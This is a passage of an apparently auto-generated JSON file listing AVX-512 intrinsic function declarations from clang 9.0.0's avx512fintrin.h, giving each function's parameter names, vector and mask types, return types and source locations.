"tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_min_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1241:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm_mask_min_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1249:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_min_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1258:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_min_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1285:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_min_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1294:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm512_min_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1322:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_min_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1328:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_min_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1336:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_min_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1344:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_min_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1350:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_min_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1358:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_min_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1366:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_min_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1372:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_min_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1380:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_min_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1388:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_min_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1394:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_min_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1402:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mul_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1410:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_mul_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1416:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_mul_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1424:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mul_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1432:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_mul_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1438:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_mul_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1446:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mullo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1454:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_mullo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1460:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_mullo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1468:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mullox_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1476:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_mullox_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1481:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_sqrt_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1501:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_sqrt_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1508:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_sqrt_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1516:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_sqrt_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1537:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_sqrt_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1544:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_sqrt_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1552:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_rsqrt14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1560:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_rsqrt14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1568:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_rsqrt14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1576:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_rsqrt14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1585:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_rsqrt14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1594:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_rsqrt14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1602:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm_rsqrt14_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1611:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_rsqrt14_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1621:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_rsqrt14_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1630:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_rsqrt14_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1639:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_rsqrt14_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1649:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_rsqrt14_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1658:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm512_rcp14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1667:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_rcp14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1676:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_rcp14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1684:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_rcp14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1693:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_rcp14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1702:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_rcp14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1710:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm_rcp14_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1719:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_rcp14_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1729:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_rcp14_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1738:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_rcp14_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1747:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_rcp14_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1757:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_rcp14_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1766:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm512_floor_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1775:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_floor_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1784:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_floor_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1793:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_floor_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1802:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_ceil_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1811:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_ceil_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1820:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_ceil_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1829:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_ceil_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1838:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_abs_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1847:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_abs_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1853:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_abs_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1861:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_abs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1869:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_abs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1875:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_abs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1883:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm_mask_add_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1891:1", "variadic": false, "inline": true, 